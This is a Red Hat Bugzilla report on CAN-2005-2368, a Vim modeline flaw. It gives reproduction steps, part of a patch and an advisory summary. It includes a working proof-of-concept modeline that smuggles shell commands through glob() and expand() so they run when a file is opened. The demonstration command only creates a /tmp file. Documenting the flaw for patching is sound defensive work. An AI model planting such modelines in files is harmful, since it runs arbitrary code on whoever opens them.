Red Hat Bugzilla – Bug 164488
CAN-2005-2368 modelines in vim can own you
Last modified: 2007-08-30 15:57:07 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Mozilla rulez!)
Description of problem:
An evil modeline can execute arbitrary shell commands when you open a file with Vim.
Version-Release number of selected component (if applicable):
vim-common-6.1-18.7x.2.3.legacy (rh7.3) vim-common-6.1-29.3.legacy (rh9)
Steps to Reproduce:
1. echo 'vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`")+expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"):' > /tmp/guninski.txt
(combination of Georgi's methods 1 and 2)
2. vim +p +q /tmp/guninski.txt
3. ls -l /tmp/where_do_you_want_*
Verified on RH73 a RH9 (with FL updates). FC1/2 are probably affected as well.
There is an official two-part patch for 6.3 at ftp://ftp.vim.org/pub/vim/patches/6.3/6.3.081 and ftp://ftp.vim.org/pub/vim/patches/6.3/6.3.082
Here is a merged version from Ubuntu (debian/patches/06_modeline_codeexec.diff):
diff -urN vim63/src/os_unix.c vim63.new/src/os_unix.c
--- vim63/src/os_unix.c 2005-07-26 11:16:28.769865769 +0000
+++ vim63.new/src/os_unix.c 2005-07-26 11:16:05.786180086 +0000
@@ -4697,6 +4697,12 @@
if (!have_wildcard(num_pat, pat))
return save_patterns(num_pat, pat, num_file, file);
+# ifdef HAVE_SANDBOX
+ /* Don't allow any shell command in the sandbox. */
+ if (sandbox != 0 && check_secure())
+ return FAIL;
* Don't allow the use of backticks in secure and restricted mode.
The patch appears to modify mch_expand_wildcards(). The code 6.1 looks similar enough to make this patch applicable without any substantial changes.
See https://rhn.redhat.com/errata/RHSA-2005-745.html for updated packages.
This effects all legacy distributions.
05.30.24 CVE: CAN-2005-2368
Platform: Cross Platform
Title: Vim ModeLines Further Variant Arbitrary Command Execution
Description: Vim is a text editor. It is susceptible to an arbitrary
command execution vulnerability which can be caused by modifying a
text file to include "ModeLines" containing the "glob()" or "expand()"
functions with shell metacharacters. Vim version 6.3.082 is released
to fix this issue.
Fedora Legacy project has ended. These will not be fixed by Fedora Legacy.